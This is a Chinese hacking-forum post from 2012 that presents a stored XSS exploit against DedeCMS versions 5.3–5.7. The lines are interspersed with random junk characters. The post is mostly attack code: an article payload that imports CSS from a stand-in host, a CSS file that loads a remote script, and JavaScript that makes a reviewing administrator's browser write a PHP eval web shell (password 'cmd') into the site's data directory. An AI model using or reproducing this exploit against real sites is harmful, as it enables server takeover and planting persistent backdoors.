找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1732|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
; r/ Q: M4 y7 J为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
: }. J- T( V  o6 u0 n. E目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。5 ~- F/ b4 b9 `2 T) b
下面说说利用方法。. r8 h* U6 m, X5 Z/ l  V" U8 `
条件有2个:
( t% Z0 n$ T. G8 U2 Y& p1.开启注册
6 E. M& J1 }  @" S' H, O& I2.开启投稿
7 r2 N) R  S/ R' y6 C/ W7 |注册会员----发表文章% L- T+ I3 P: h8 t( F
内容填写:
) u) O8 `9 B- U复制代码& \4 r" i, L& q- N7 b# M
<style>@im\port'\http://xxx.com/xss.css';</style>
' U7 ]$ ^2 Q4 J新建XSS.Css
9 y5 m# e. t' S" w复制代码; R$ L7 D! ^' o# j1 x
.body{1 h. ^1 y/ A3 M7 U* }. v
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
; E6 e+ R! W2 ~! {, G3 |新建xss.js 内容为
, [6 m; b; k4 K9 S3 {复制代码$ t' f, }* `6 Z  |. Z& ^
1.var request = false;
; b, y; k; Z3 _3 h9 @2.if(window.XMLHttpRequest) {' `6 E8 g( }, s
3.request = new XMLHttpRequest();0 A$ Y5 Z6 l% y# _+ [3 Y
4.if(request.overrideMimeType) {
8 @& d* ^& k) V, |5.request.overrideMimeType('text/xml');! b! z: w! z- T: I
6.}, L$ ~: }' `  g: U; y8 o3 r$ W
7.} else if(window.ActiveXObject) {
7 M! S! f# z/ L+ [3 z" _8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];& l. {& v7 U% v: X9 L& ^
9.for(var i=0; i<versions.length; i++) {- E, B3 b. X' B, x9 ^
10.try {6 _  W. `( R6 c. d1 M6 q2 C* K
11.request = new ActiveXObject(versions);9 G7 o9 P, A2 n. z) d
12.} catch(e) {}
3 b- j- a, Q% x1 p/ g. n( ~13.}
" M. n3 J. g; J% |( a14.}! _8 R8 e6 m1 V
15.xmlhttp=request;
& T( \. S! S' ?16.function getFolder( url ){
; P+ A* p7 P/ e7 P* @* T5 L. c( }* r17. obj = url.split('/')6 e: I+ O6 @0 S( L
18. return obj[obj.length-2]
2 Q, A* }$ X) D5 p19.}& J+ G1 x! N) b0 U( \3 C4 h3 y- j
20.oUrl = top.location.href;8 X3 H3 h7 ~2 J# f7 K# l" v. X& G( J' q
21.u = getFolder(oUrl);
, k* A! F9 W% V1 p1 u22.add_admin();
, U. H2 f! Z; B5 i/ `23.function add_admin(){; U+ {1 g- H7 K- Y( z* I5 c& v, H
24.var url= "/"+u+"/sys_sql_query.php";
5 b' a+ G! a4 z5 I0 V  n25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";' p4 a  C) u% n' _
26.xmlhttp.open("POST", url, true);1 e  Z: O. o7 u) Z, p* K: j; y( l
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");- h( s1 o- p% f+ C
28.xmlhttp.setRequestHeader("Content-length", params.length);: p$ O5 m9 h0 M- C. t$ M* U
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
& a& d5 n) `+ P30.xmlhttp.send(params);- n2 \4 x& q2 b6 _/ p! P) E- ~
31.}
9 F! g# i, J: h4 s( g5 ?  G当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表